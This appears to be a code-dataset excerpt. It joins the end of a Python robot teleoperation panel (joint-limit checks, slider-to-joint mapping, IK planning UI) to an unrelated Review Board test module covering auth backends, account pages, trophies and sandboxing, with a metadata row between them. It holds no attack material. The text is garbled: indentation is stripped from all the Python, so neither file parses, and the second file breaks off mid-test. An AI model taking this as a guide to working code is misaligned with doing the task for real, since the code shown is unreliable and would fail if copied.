limitsArray = self.jointLimitsMin if epsilon < 0 else self.jointLimitsMax
limitsArray[self.toJointIndex(jointName)] += epsilon
def checkJointLimits(self):
limitData = []
for jointName in self.joints:
jointIndex = self.toJointIndex(jointName)
jointPosition = self.sensorJointController.q[jointIndex]
jointMin, jointMax = self.jointLimitsMin[jointIndex], self.jointLimitsMax[jointIndex]
if not (jointMin <= jointPosition <= jointMax):
epsilon = jointPosition - np.clip(jointPosition, jointMin, jointMax)
#print 'detected joint outside limit:', jointName, ' by %.3f degrees' % np.degrees(epsilon)
limitData.append((jointName, epsilon, jointPosition))
return limitData
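# Note (added): in checkJointLimits() above, epsilon is the signed excess
# beyond the limit: it is negative when the joint sits below jointMin and
# positive when it sits above jointMax. For example, with limits [0.0, 1.0]
# a measured position of 1.2 gives epsilon = 1.2 - clip(1.2, 0.0, 1.0) = 0.2.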
def toJointIndex(self, jointName):
return robotstate.getDrakePoseJointNames().index(jointName)
class GeneralEndEffectorTeleopPanel(object):
def __init__(self, ikPlanner, teleopPanel, robotStateModel, robotStateJointController):
self.ikPlanner = ikPlanner
self.teleopPanel = teleopPanel
self.robotStateModel = robotStateModel
self.robotStateJointController = robotStateJointController
self.widget = QtGui.QWidget()
l = QtGui.QVBoxLayout(self.widget)
h = QtGui.QHBoxLayout()
l.addLayout(h)
h.addWidget(QtGui.QLabel('End effector:'))
self.endEffectorCombo = QtGui.QComboBox()
h.addWidget(self.endEffectorCombo)
def addButton(name, func):
b = QtGui.QPushButton(name)
b.connect('clicked()', func)
l.addWidget(b)
addButton('start ik', self.startIk)
addButton('end ik', self.endIk)
addButton('plan', self.planIk)
config = drcargs.getDirectorConfig()['endEffectorConfig']
self.endEffectorLinkNames = config['endEffectorLinkNames']
self.graspOffsetFrame = transformUtils.frameFromPositionAndRPY(config['graspOffsetFrame'][0], np.degrees(config['graspOffsetFrame'][1]))
self.fixedJoints = config['fixedJoints']
for linkName in self.endEffectorLinkNames:
self.endEffectorCombo.addItem(linkName)
def planIk(self):
startPoseName = 'reach_start'
endPoseName = 'reach_end'
startPose = self.teleopPanel.planningUtils.getPlanningStartPose()
self.ikPlanner.addPose(startPose, startPoseName)
goalMode = ikplanner.getIkOptions().getProperty('Goal planning mode')
if goalMode == 1:
plan = self.constraintSet.runIkTraj()
else:
plan = self.constraintSet.planEndPoseGoal()
self.teleopPanel.showPlan(plan)
def endIk(self):
self.teleopPanel.hideTeleopModel()
EndEffectorTeleopPanel.removePlanFolder()
def startIk(self, reachGoal=None):
EndEffectorTeleopPanel.removePlanFolder()
ikPlanner = self.ikPlanner
startPoseName = 'reach_start'
endPoseName = 'reach_end'
startPose = self.teleopPanel.planningUtils.getPlanningStartPose()
ikPlanner.addPose(startPose, startPoseName)
endEffectorLinkName = str(self.endEffectorCombo.currentText)
if reachGoal is None:
endEffectorLinkFrame = self.robotStateModel.getLinkFrame(endEffectorLinkName)
assert endEffectorLinkFrame is not None
graspToWorld = vtk.vtkTransform()
graspToWorld.PostMultiply()
graspToWorld.Concatenate(self.graspOffsetFrame)
graspToWorld.Concatenate(endEffectorLinkFrame)
reachGoal = graspToWorld
om.removeFromObjectModel('reach goal')
goalFrame = vis.showFrame(reachGoal, 'reach goal', scale=0.1, parent=EndEffectorTeleopPanel.getConstraintFrameFolder())
goalFrame.setProperty('Edit', True)
constraints = []
for pattern in self.fixedJoints:
constraints.append(ikPlanner.createPostureConstraint(startPoseName, robotstate.matchJoints(pattern)))
constraints.extend(ikPlanner.createPositionOrientationConstraint(endEffectorLinkName, goalFrame, self.graspOffsetFrame, positionTolerance=0.0, angleToleranceInDegrees=0.0))
constraints[-1].tspan = [1.0, 1.0]
constraints[-2].tspan = [1.0, 1.0]
self.constraintSet = ikplanner.ConstraintSet(ikPlanner, constraints, endPoseName, startPoseName)
def onGoalFrameModified(frame):
endPose, info = self.constraintSet.runIk()
self.teleopPanel.showPose(self.constraintSet.endPose)
app.displaySnoptInfo(info)
goalFrame.connectFrameModified(onGoalFrameModified)
onGoalFrameModified(goalFrame)
folder = EndEffectorTeleopPanel.getConstraintFolder()
for i, constraint in enumerate(constraints):
constraintItem = ConstraintItem(constraint)
om.addToObjectModel(constraintItem, parentObj=folder)
class JointTeleopPanel(object):
def __init__(self, panel, jointGroups=None):
self.panel = panel
self.ui = panel.ui
self.ui.jointTeleopButton.connect('clicked()', self.teleopButtonClicked)
self.ui.resetJointsButton.connect('clicked()', self.resetButtonClicked)
self.ui.planButton.connect('clicked()', self.planClicked)
self.timerCallback = TimerCallback()
self.timerCallback.callback = self.onTimerCallback
self.jointLimitsMin = np.array([self.panel.teleopRobotModel.model.getJointLimits(jointName)[0] for jointName in robotstate.getDrakePoseJointNames()])
self.jointLimitsMax = np.array([self.panel.teleopRobotModel.model.getJointLimits(jointName)[1] for jointName in robotstate.getDrakePoseJointNames()])
# this needs to be generalized
if 'baseZJointLimits' in drcargs.getDirectorConfig():
baseZLimits = drcargs.getDirectorConfig()['baseZJointLimits']
else: # TODO generalise so the base sliders are deactivated
baseZLimits = [-0.1, 0.1]
self.jointLimitsMin[0:6] = [-0.25, -0.25, baseZLimits[0], -math.radians(20), -math.radians(20), -math.radians(20)]
self.jointLimitsMax[0:6] = [ 0.25 , 0.25, baseZLimits[1], math.radians(20), math.radians(20), math.radians(20)]
if jointGroups is None:
# Add only these joint groups:
teleopJointGroupNames = ['Back', 'Base', 'Left Arm', 'Right Arm', 'Neck']
allJointGroups = drcargs.getDirectorConfig()['teleopJointGroups']
jointGroups = []
for jointGroup in allJointGroups:
if jointGroup['name'] in teleopJointGroupNames:
jointGroups.append( jointGroup )
self.jointGroups = jointGroups
self.buildTabWidget(jointGroups)
self.startPose = None
self.endPose = None
self.userJoints = {}
self.updateWidgetState()
def buildTabWidget(self, jointGroups):
self.slidersMap = {}
self.labelMap = {}
for group in jointGroups:
groupName = group['name']
joints = group['joints']
labels = group['labels']
if len(labels) != len(joints):
print 'error, joints/labels mismatch for joint group:', groupName
continue
jointGroupWidget = QtGui.QWidget()
gridLayout = QtGui.QGridLayout(jointGroupWidget)
gridLayout.setColumnStretch(0, 1)
for jointName, labelText in zip(joints, labels):
label = QtGui.QLabel(labelText)
numericLabel = QtGui.QLabel('0.0')
slider = QtGui.QSlider(QtCore.Qt.Vertical)
column = gridLayout.columnCount()
gridLayout.addWidget(label, 0, column)
gridLayout.addWidget(slider, 1, column)
gridLayout.addWidget(numericLabel, 2, column)
self.slidersMap[jointName] = slider
self.labelMap[slider] = numericLabel
if groupName == 'Neck':
def onSendNeckJointPositionGoal():
msg = lcmbotcore.joint_angles_t()
msg.utime = getUtime()
msg.num_joints = len(joints)
msg.joint_name = joints
msg.joint_position = [0] * len(joints)
for i, jointName in enumerate(joints):
jointIndex = self.toJointIndex(jointName)
msg.joint_position[i] = self.getJointValue(jointIndex)
lcmUtils.publish('DESIRED_NECK_ANGLES', msg)
sendNeckJointPositionGoalButton = QtGui.QPushButton('set')
sendNeckJointPositionGoalButton.connect('clicked()', onSendNeckJointPositionGoal)
gridLayout.addWidget(sendNeckJointPositionGoalButton, 3, gridLayout.columnCount())
gridLayout.setColumnStretch(gridLayout.columnCount(), 1)
self.ui.tabWidget.addTab(jointGroupWidget, groupName)
self.signalMapper = QtCore.QSignalMapper()
self.sliderMax = 1000.0
for jointName, slider in self.slidersMap.iteritems():
slider.connect('valueChanged(int)', self.signalMapper, 'map()')
self.signalMapper.setMapping(slider, jointName)
slider.setMaximum(self.sliderMax)
self.signalMapper.connect('mapped(const QString&)', self.sliderChanged)
def planClicked(self):
if not self.ui.jointTeleopButton.checked:
return
self.computeEndPose()
self.generatePlan()
def generatePlan(self):
hasBase = False
for jointIndex, jointValue in self.userJoints.iteritems():
if self.toJointName(jointIndex).startswith('base_'):
hasBase = True
plan = self.panel.ikPlanner.computePostureGoal(self.startPose, self.endPose, feetOnGround=hasBase)
self.panel.showPlan(plan)
def teleopButtonClicked(self):
if self.ui.jointTeleopButton.checked:
self.activate()
else:
self.deactivate()
def activate(self):
self.timerCallback.stop()
self.panel.jointTeleopActivated()
self.resetPose()
self.updateWidgetState()
def deactivate(self):
self.ui.jointTeleopButton.blockSignals(True)
self.ui.jointTeleopButton.checked = False
self.ui.jointTeleopButton.blockSignals(False)
self.timerCallback.stop()
self.panel.jointTeleopDeactivated()
self.updateWidgetState()
def updateWidgetState(self):
enabled = self.ui.jointTeleopButton.checked
for slider in self.slidersMap.values():
slider.setEnabled(enabled)
self.ui.resetJointsButton.setEnabled(enabled)
if not enabled:
self.timerCallback.start()
def resetButtonClicked(self):
self.resetPose()
self.panel.showPose(self.endPose)
def resetPose(self):
self.userJoints = {}
self.computeEndPose()
self.updateSliders()
def onTimerCallback(self):
if not self.ui.tabWidget.visible:
return
self.resetPose()
def toJointIndex(self, jointName):
return robotstate.getDrakePoseJointNames().index(jointName)
def toJointName(self, jointIndex):
return robotstate.getDrakePoseJointNames()[jointIndex]
def toJointValue(self, jointIndex, sliderValue):
assert 0.0 <= sliderValue <= 1.0
jointRange = self.jointLimitsMin[jointIndex], self.jointLimitsMax[jointIndex]
return jointRange[0] + (jointRange[1] - jointRange[0])*sliderValue
def toSliderValue(self, jointIndex, jointValue):
jointRange = self.jointLimitsMin[jointIndex], self.jointLimitsMax[jointIndex]
#if jointValue < jointRange[0] or jointValue > jointRange[1]:
# print 'warning: joint %s value %f is out of expected range [%f, %f]' % (self.toJointName(jointIndex), jointValue, jointRange[0], jointRange[1])
return (jointValue - jointRange[0]) / (jointRange[1] - jointRange[0])
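# Note (added): toJointValue() and toSliderValue() above are inverse linear
# maps between the normalized slider range [0, 1] and the joint range
# [min, max]:
#   jointValue  = min + (max - min) * sliderValue
#   sliderValue = (jointValue - min) / (max - min)
# e.g. with limits [-1.0, 1.0] a normalized slider value of 0.75 maps to 0.5.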
def getSlider(self, joint):
jointName = self.toJointName(joint) if isinstance(joint, int) else joint
return self.slidersMap[jointName]
def computeBaseJointOffsets(self):
if self.panel.ikPlanner.robotNoFeet:
baseReferenceFrame = vtk.vtkTransform()
else:
from director import footstepsdriver
baseReferenceFrame = footstepsdriver.FootstepsDriver.getFeetMidPoint(self.panel.ikPlanner.getRobotModelAtPose(self.startPose))
baseReferenceWorldPos = np.array(baseReferenceFrame.GetPosition())
baseReferenceWorldYaw = math.radians(baseReferenceFrame.GetOrientation()[2])
self.baseJointOffsets = {
'base_x' : baseReferenceWorldPos[0],
'base_y' : baseReferenceWorldPos[1],
'base_z' : baseReferenceWorldPos[2],
'base_yaw' : baseReferenceWorldYaw,
}
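# Note (added): the base sliders are interpreted relative to this reference
# frame (the midpoint between the feet, or the identity transform for robots
# without feet): sliderChanged() adds the offset back onto the absolute base
# joint value, and updateSliders() subtracts it again before display.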
def computeEndPose(self):
self.startPose = self.panel.planningUtils.getPlanningStartPose()
self.endPose = self.startPose.copy()
hasBase = False
for jointIndex, jointValue in self.userJoints.iteritems():
jointName = self.toJointName(jointIndex)
self.endPose[jointIndex] = jointValue
if jointName.startswith('base_'):
hasBase = True
if hasBase:
ikPlanner = self.panel.ikPlanner
startPoseName = 'posture_goal_start'
ikPlanner.addPose(self.startPose, startPoseName)
endPoseName = 'posture_goal_end'
ikPlanner.addPose(self.endPose, endPoseName)
jointNamesAll = self.slidersMap.keys()
# remove leg joints
jointNames = []
for name in jointNamesAll:
if not 'leg' in name:
jointNames.append(name)
# uncomment to constrain only the joints adjusted by the user
#jointNames = [self.toJointName(jointIndex) for jointIndex in sorted(self.userJoints.keys())]
p = ikPlanner.createPostureConstraint(endPoseName, jointNames)
constraints = [p]
constraints.extend(ikPlanner.createFixedFootConstraints(startPoseName))
constraints.append(ikPlanner.createQuasiStaticConstraint())
self.endPose, info = ikPlanner.ikServer.runIk(constraints, ikPlanner.defaultIkParameters, nominalPostureName=startPoseName, seedPostureName='q_end')
app.displaySnoptInfo(info)
def getJointValue(self, jointIndex):
return self.endPose[jointIndex]
def sliderChanged(self, jointName):
slider = self.slidersMap[jointName]
jointIndex = self.toJointIndex(jointName)
jointValue = self.toJointValue(jointIndex, slider.value / float(self.sliderMax))
self.userJoints[jointIndex] = jointValue
if jointName.startswith('base_'):
self.computeBaseJointOffsets()
self.userJoints[jointIndex] += self.baseJointOffsets.get(jointName, 0.0)
self.computeEndPose()
self.panel.showPose(self.endPose)
self.updateLabel(jointName, jointValue)
def updateLabel(self, jointName, jointValue):
slider = self.slidersMap[jointName]
label = self.labelMap[slider]
if jointName in ['base_x', 'base_y', 'base_z']:
label.text = str('%.3f' % jointValue).center(5, ' ')
else:
label.text = str('%.1f' % math.degrees(jointValue)).center(5, ' ')
def updateSliders(self):
baseJointOffsets = None
for jointName, slider in self.slidersMap.iteritems():
jointIndex = self.toJointIndex(jointName)
jointValue = self.getJointValue(jointIndex)
if not self.panel.ikPlanner.fixedBaseArm:
if jointName.startswith('base_'):
if baseJointOffsets is None:
self.computeBaseJointOffsets()
baseJointOffsets = self.baseJointOffsets
jointValue -= self.baseJointOffsets.get(jointName, 0.0)
slider.blockSignals(True)
slider.setValue(self.toSliderValue(jointIndex, jointValue)*self.sliderMax)
slider.blockSignals(False)
self.updateLabel(jointName, jointValue)
class TeleopPanel(object):
def __init__(self, robotStateModel, robotStateJointController, teleopRobotModel, teleopJointController, ikPlanner, manipPlanner, affordanceManager, showPlanFunction, hidePlanFunction, planningUtils):
self.robotStateModel = robotStateModel
self.robotStateJointController = robotStateJointController
self.teleopRobotModel = teleopRobotModel
self.teleopJointController = teleopJointController
self.ikPlanner = ikPlanner
self.manipPlanner = manipPlanner
self.affordanceManager = affordanceManager
self.showPlanFunction = showPlanFunction
self.hidePlanFunction = hidePlanFunction
self.planningUtils = planningUtils
manipPlanner.connectPlanCommitted(self.onPlanCommitted)
loader = QtUiTools.QUiLoader()
uifile = QtCore.QFile(':/ui/ddTeleopPanel.ui')
assert uifile.open(uifile.ReadOnly)
self.widget = loader.load(uifile)
uifile.close()
self.ui = WidgetDict(self.widget.children())
self.ui.postureDatabaseButton.connect('clicked()', self.onPostureDatabaseClicked)
self.endEffectorTeleop = EndEffectorTeleopPanel(self)
self.jointTeleop = JointTeleopPanel(self)
if 'endEffectorConfig' in drcargs.getDirectorConfig():
self.ui.endEffectorTeleopFrame.setVisible(False)
self.generalEndEffectorTeleopPanel = GeneralEndEffectorTeleopPanel(ikPlanner, self, robotStateModel, robotStateJointController)
self.widget.layout().addWidget(self.generalEndEffectorTeleopPanel.widget, 0, 0, 1, 2)
app.addShortcut(app.getMainWindow(), 'Ctrl+Shift+P', self.ui.planButton.click)
PythonQt.dd.ddGroupBoxHider(self.ui.paramsContainer)
PythonQt.dd.ddGroupBoxHider(self.ui.finalPosePlanningOptions)
def onPostureDatabaseClicked(self):
ikplanner.RobotPoseGUIWrapper.initCaptureMethods(self.robotStateJointController, self.teleopJointController)
ikplanner.RobotPoseGUIWrapper.show()
def disableJointTeleop(self):
self.ui.jointTeleopFrame.setEnabled(False)
def disableEndEffectorTeleop(self):
self.ui.endEffectorTeleopFrame.setEnabled(False)
def jointTeleopActivated(self):
self.disableEndEffectorTeleop()
def endEffectorTeleopActivated(self):
self.disableJointTeleop()
def endEffectorTeleopDeactivated(self):
self.hideTeleopModel()
self.enablePanels()
def jointTeleopDeactivated(self):
self.hideTeleopModel()
self.enablePanels()
def enablePanels(self):
self.ui.endEffectorTeleopFrame.setEnabled(True)
self.ui.jointTeleopFrame.setEnabled(True)
def onPlanCommitted(self, plan):
self.hideTeleopModel()
def hideTeleopModel(self):
self.teleopRobotModel.setProperty('Visible', False)
self.robotStateModel.setProperty('Visible', True)
self.robotStateModel.setProperty('Alpha', 1.0)
def showTeleopModel(self):
self.teleopRobotModel.setProperty('Visible', True)
self.robotStateModel.setProperty('Visible', True)
self.robotStateModel.setProperty('Alpha', 0.1)
def showPose(self, pose):
self.teleopJointController.setPose('teleop_pose', pose)
self.hidePlanFunction()
self.showTeleopModel()
def showPlan(self, plan):
self.hideTeleopModel()
self.showPlanFunction(plan)
def extendJointLimitsForTesting(teleopPanel, jointLimitChecker):
# add +/- 3 degrees to joint teleop sliders
jointTeleop = teleopPanel.jointTeleop
extra = np.zeros(len(jointTeleop.jointLimitsMin))
extra += np.deg2rad(3.0)
jointTeleop.jointLimitsMin -= extra
jointTeleop.jointLimitsMax += extra
# add +/- 4 degrees to planner joint limits
limitDataMin = [(name, -np.deg2rad(4.0)) for name in jointLimitChecker.joints]
limitDataMax = [(name, np.deg2rad(4.0)) for name in jointLimitChecker.joints]
teleopPanel.ikPlanner.ikServer.updateJointLimits(limitDataMin)
teleopPanel.ikPlanner.ikServer.updateJointLimits(limitDataMax)
def _getAction():
return app.getToolBarActions()['ActionTeleopPanel']
def addPanelToMainWindow(teleopPanel):
global panel
global dock
panel = teleopPanel
dock = app.addWidgetToDock(panel.widget, action=_getAction())
dock.hide()
def init(robotStateModel, robotStateJointController, teleopRobotModel, teleopJointController, ikPlanner, manipPlanner, affordanceManager, showPlanFunction, hidePlanFunction, planningUtils):
panel = TeleopPanel(robotStateModel, robotStateJointController, teleopRobotModel, teleopJointController, ikPlanner, manipPlanner, affordanceManager, showPlanFunction, hidePlanFunction, planningUtils)
addPanelToMainWindow(panel)
return panel
|
mitdrc/director
|
src/python/director/teleoppanel.py
|
Python
|
bsd-3-clause
| 60,475
|
[
"VTK"
] |
a5de9988f2b42842e9db02a4718e7257a2419e266bf7c81b69aea700c0eca05d
|
from __future__ import unicode_literals
import re
from django.contrib import messages
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.test.client import RequestFactory
from djblets.registries.errors import ItemLookupError, RegistrationError
from djblets.testing.decorators import add_fixtures
from kgb import SpyAgency
from reviewboard.accounts.backends import (AuthBackend, auth_backends,
get_enabled_auth_backends,
INVALID_USERNAME_CHAR_REGEX,
register_auth_backend,
StandardAuthBackend,
unregister_auth_backend)
from reviewboard.accounts.forms.pages import (AccountPageForm,
ChangePasswordForm,
ProfileForm)
from reviewboard.accounts.models import (LocalSiteProfile,
Profile,
ReviewRequestVisit,
Trophy)
from reviewboard.accounts.pages import (AccountPage, get_page_classes,
register_account_page_class,
unregister_account_page_class)
from reviewboard.testing import TestCase
class DummyAuthBackend(AuthBackend):
backend_id = 'dummy'
class AuthBackendTests(TestCase):
"""Testing authentication backends."""
def _get_standard_auth_backend(self):
backend = None
for backend in get_enabled_auth_backends():
# We do not use isinstance here because we specifically want a
# StandardAuthBackend and not an instance of a subclass of it.
if type(backend) is StandardAuthBackend:
break
self.assertIs(type(backend), StandardAuthBackend)
return backend
@add_fixtures(['test_users'])
def test_get_or_create_user_exists(self):
"""Testing StandardAuthBackend.get_or_create_user when the requested
user already exists
"""
original_count = User.objects.count()
user = User.objects.get(username='doc')
backend = self._get_standard_auth_backend()
result = backend.get_or_create_user('doc', None)
self.assertEqual(original_count, User.objects.count())
self.assertEqual(user, result)
def test_get_or_create_user_new(self):
"""Testing StandardAuthBackend.get_or_create_user when the requested
user does not exist
"""
backend = self._get_standard_auth_backend()
self.assertIsInstance(backend, StandardAuthBackend)
user = backend.get_or_create_user('doc', None)
self.assertIsNone(user)
@add_fixtures(['test_users'])
def test_get_user_exists(self):
"""Testing StandardAuthBackend.get_user when the requested user already
exists
"""
user = User.objects.get(username='doc')
backend = self._get_standard_auth_backend()
result = backend.get_user(user.pk)
self.assertEqual(user, result)
def test_get_user_not_exists(self):
"""Testing StandardAuthBackend.get_user when the requested user does
not exist
"""
backend = self._get_standard_auth_backend()
result = backend.get_user(1)
self.assertIsNone(result)
class AuthBackendRegistryTests(TestCase):
@classmethod
def setUpClass(cls):
super(AuthBackendRegistryTests, cls).setUpClass()
auth_backends.reset()
def tearDown(self):
super(AuthBackendRegistryTests, self).tearDown()
auth_backends.reset()
def test_register_auth_backend(self):
"""Testing register_auth_backend"""
starting_set = set(auth_backends)
register_auth_backend(DummyAuthBackend)
self.assertSetEqual(set(auth_backends),
starting_set | {DummyAuthBackend})
def test_unregister_auth_backend(self):
"""Testing unregister_auth_backend"""
starting_set = set(auth_backends)
register_auth_backend(DummyAuthBackend)
unregister_auth_backend(DummyAuthBackend)
self.assertSetEqual(set(auth_backends), starting_set)
class ReviewRequestVisitTests(TestCase):
"""Testing the ReviewRequestVisit model"""
fixtures = ['test_users']
def test_default_visibility(self):
"""Testing default value of ReviewRequestVisit.visibility"""
review_request = self.create_review_request(publish=True)
self.client.login(username='admin', password='admin')
self.client.get(review_request.get_absolute_url())
visit = ReviewRequestVisit.objects.get(
user__username='admin', review_request=review_request.id)
self.assertEqual(visit.visibility, ReviewRequestVisit.VISIBLE)
class ProfileTests(TestCase):
"""Test the Profile model."""
fixtures = ['test_users']
def test_is_profile_visible_with_public(self):
"""Testing User.is_profile_public with public profiles."""
user1 = User.objects.get(username='admin')
user2 = User.objects.get(username='doc')
self.assertTrue(user1.is_profile_visible(user2))
def test_is_profile_visible_with_private(self):
"""Testing User.is_profile_public with private profiles."""
user1 = User.objects.get(username='admin')
user2 = User.objects.get(username='doc')
profile = user1.get_profile()
profile.is_private = True
profile.save()
self.assertFalse(user1.is_profile_visible(user2))
self.assertTrue(user1.is_profile_visible(user1))
user2.is_staff = True
self.assertTrue(user1.is_profile_visible(user2))
@add_fixtures(['test_scmtools', 'test_site'])
def test_is_star_unstar_updating_count_correctly(self):
"""Testing if star, unstar affect review request counts correctly."""
user1 = User.objects.get(username='admin')
profile1 = user1.get_profile()
review_request = self.create_review_request(publish=True)
site_profile = profile1.site_profiles.get(local_site=None)
profile1.star_review_request(review_request)
site_profile = LocalSiteProfile.objects.get(pk=site_profile.pk)
self.assertTrue(review_request in
profile1.starred_review_requests.all())
self.assertEqual(site_profile.starred_public_request_count, 1)
profile1.unstar_review_request(review_request)
site_profile = LocalSiteProfile.objects.get(pk=site_profile.pk)
self.assertFalse(review_request in
profile1.starred_review_requests.all())
self.assertEqual(site_profile.starred_public_request_count, 0)
class AccountPageTests(TestCase):
"""Test account page functionality."""
builtin_pages = set(['settings', 'authentication', 'profile', 'groups',
'api-tokens'])
def tearDown(self):
"""Uninitialize this test case."""
super(AccountPageTests, self).tearDown()
AccountPage.registry.reset()
def test_default_pages(self):
"""Testing default list of account pages."""
page_classes = list(get_page_classes())
self.assertEqual(len(page_classes), len(self.builtin_pages))
page_class_ids = [page_cls.page_id for page_cls in page_classes]
self.assertEqual(set(page_class_ids), self.builtin_pages)
def test_register_account_page_class(self):
"""Testing register_account_page_class."""
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
register_account_page_class(MyPage)
page_classes = list(get_page_classes())
self.assertEqual(len(page_classes), len(self.builtin_pages) + 1)
self.assertEqual(page_classes[-1], MyPage)
def test_register_account_page_class_with_duplicate(self):
"""Testing register_account_page_class with duplicate page."""
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
register_account_page_class(MyPage)
with self.assertRaises(RegistrationError):
register_account_page_class(MyPage)
def test_unregister_account_page_class(self):
"""Testing unregister_account_page_class."""
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
register_account_page_class(MyPage)
unregister_account_page_class(MyPage)
page_classes = list(get_page_classes())
self.assertEqual(len(page_classes), len(self.builtin_pages))
def test_unregister_unknown_account_page_class(self):
"""Testing unregister_account_page_class with unknown page."""
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
with self.assertRaises(ItemLookupError):
unregister_account_page_class(MyPage)
def test_add_form_to_page(self):
"""Testing AccountPage.add_form."""
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
class MyForm(AccountPageForm):
form_id = 'test-form'
register_account_page_class(MyPage)
MyPage.add_form(MyForm)
self.assertEqual(MyPage.form_classes, [MyForm])
def test_add_duplicate_form_to_page(self):
"""Testing AccountPage.add_form with duplicate form ID."""
class MyForm(AccountPageForm):
form_id = 'test-form'
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
form_classes = [MyForm]
register_account_page_class(MyPage)
with self.assertRaises(RegistrationError):
MyPage.add_form(MyForm)
self.assertEqual(MyPage.form_classes, [MyForm])
def test_remove_form_from_page(self):
"""Testing AccountPage.remove_form."""
class MyForm(AccountPageForm):
form_id = 'test-form'
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
form_classes = [MyForm]
register_account_page_class(MyPage)
MyPage.remove_form(MyForm)
self.assertEqual(MyPage.form_classes, [])
def test_remove_unknown_form_from_page(self):
"""Testing AccountPage.remove_form with unknown form."""
class MyForm(AccountPageForm):
form_id = 'test-form'
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
register_account_page_class(MyPage)
with self.assertRaises(ItemLookupError):
MyPage.remove_form(MyForm)
def test_default_form_classes_for_page(self):
"""Testing AccountPage._default_form_classes persistence"""
class MyForm(AccountPageForm):
form_id = 'test-form'
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
form_classes = [MyForm]
register_account_page_class(MyPage)
self.assertEqual(MyPage.form_classes, [MyForm])
unregister_account_page_class(MyPage)
self.assertEqual(MyPage.form_classes, [])
register_account_page_class(MyPage)
self.assertEqual(MyPage.form_classes, [MyForm])
def test_empty_default_form_classes_for_page(self):
"""Testing AccountPage._default_form_classes with no form_classes"""
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
class MyForm(AccountPageForm):
form_id = 'test-form'
register_account_page_class(MyPage)
self.assertEqual(MyPage.form_classes, [])
MyPage.add_form(MyForm)
self.assertEqual(MyPage.form_classes, [MyForm])
unregister_account_page_class(MyPage)
self.assertEqual(MyPage.form_classes, [])
register_account_page_class(MyPage)
self.assertEqual(MyPage.form_classes, [])
class UsernameTests(TestCase):
"""Unit tests for username rules."""
cases = [
('spaces ', 'spaces'),
('spa ces', 'spaces'),
('CASES', 'cases'),
('CaSeS', 'cases'),
('Spec!al', 'specal'),
('email@example.com', 'email@example.com'),
('da-shes', 'da-shes'),
('un_derscores', 'un_derscores'),
('mu ^lt&^ipl Es', 'multiples'),
]
def test(self):
"""Testing username regex for LDAP/AD backends."""
for orig, new in self.cases:
self.assertEqual(
re.sub(INVALID_USERNAME_CHAR_REGEX, '', orig).lower(),
new)
class TrophyTests(TestCase):
"""Test the Trophy Case."""
fixtures = ['test_users']
def test_is_fish_trophy_awarded_for_new_review_request(self):
"""Testing if a fish trophy is awarded for a new review request."""
user1 = User.objects.get(username='doc')
category = 'fish'
review_request = self.create_review_request(publish=True, id=3223,
submitter=user1)
trophies = Trophy.objects.get_trophies(review_request)
self.assertEqual(trophies[0].category, category)
self.assertTrue(
trophies[0].review_request.extra_data['calculated_trophies'])
def test_is_fish_trophy_awarded_for_older_review_request(self):
"""Testing if a fish trophy is awarded for an older review request."""
user1 = User.objects.get(username='doc')
category = 'fish'
review_request = self.create_review_request(publish=True, id=1001,
submitter=user1)
del review_request.extra_data['calculated_trophies']
trophies = Trophy.objects.get_trophies(review_request)
self.assertEqual(trophies[0].category, category)
self.assertTrue(
trophies[0].review_request.extra_data['calculated_trophies'])
def test_is_milestone_trophy_awarded_for_new_review_request(self):
"""Testing if a milestone trophy is awarded for a new review request.
"""
user1 = User.objects.get(username='doc')
category = 'milestone'
review_request = self.create_review_request(publish=True, id=1000,
submitter=user1)
trophies = Trophy.objects.compute_trophies(review_request)
self.assertEqual(trophies[0].category, category)
self.assertTrue(
trophies[0].review_request.extra_data['calculated_trophies'])
def test_is_milestone_trophy_awarded_for_older_review_request(self):
"""Testing if a milestone trophy is awarded for an older review
request.
"""
user1 = User.objects.get(username='doc')
category = 'milestone'
review_request = self.create_review_request(publish=True, id=10000,
submitter=user1)
del review_request.extra_data['calculated_trophies']
trophies = Trophy.objects.compute_trophies(review_request)
self.assertEqual(trophies[0].category, category)
self.assertTrue(
trophies[0].review_request.extra_data['calculated_trophies'])
def test_is_no_trophy_awarded(self):
"""Testing if no trophy is awarded."""
user1 = User.objects.get(username='doc')
review_request = self.create_review_request(publish=True, id=999,
submitter=user1)
trophies = Trophy.objects.compute_trophies(review_request)
self.assertFalse(trophies)
class SandboxAuthBackend(AuthBackend):
"""Mock authentication backend to test extension sandboxing."""
backend_id = 'test-id'
name = 'test'
supports_change_name = True
supports_change_email = True
supports_change_password = True
def authenticate(self, username, password):
"""Raise an exception to test sandboxing."""
raise Exception
def update_password(self, user, password):
"""Raise an exception to test sandboxing."""
raise Exception
def update_name(self, user):
"""Raise an exception to test sandboxing."""
raise Exception
def update_email(self, user):
"""Raise an exception to test sandboxing."""
raise Exception
class SandboxTests(SpyAgency, TestCase):
"""Test extension sandboxing."""
def setUp(self):
"""Initialize this test case."""
super(SandboxTests, self).setUp()
self.factory = RequestFactory()
self.request = self.factory.get('test')
self.user = User.objects.create_user(username='reviewboard', email='',
password='password')
self.profile = Profile.objects.get_or_create(user=self.user)
self.spy_on(get_enabled_auth_backends,
call_fake=lambda: [SandboxAuthBackend()])
# Suppresses MessageFailure Exception at the end of save()
self.spy_on(messages.add_message,
call_fake=lambda x, y, z: None)
def tearDown(self):
"""Uninitialize this test case."""
super(SandboxTests, self).tearDown()
def test_authenticate_auth_backend(self):
"""Testing sandboxing of AuthBackend.authenticate."""
form = ChangePasswordForm(page=None, request=self.request,
user=self.user)
form.cleaned_data = {
'old_password': self.user.password,
}
self.spy_on(SandboxAuthBackend.authenticate)
self.assertRaisesMessage(
ValidationError,
'Unexpected error when validating the password. '
'Please contact the administrator.',
lambda: form.clean_old_password())
self.assertTrue(SandboxAuthBackend.authenticate.called)
def test_update_password_auth_backend(self):
"""Testing sandboxing of AuthBackend.update_password."""
form = ChangePasswordForm(page=None, request=self.request,
user=self.user)
form.cleaned_data = {
'old_password': self.user.password,
'password1': 'password1',
'password2': 'password1',
}
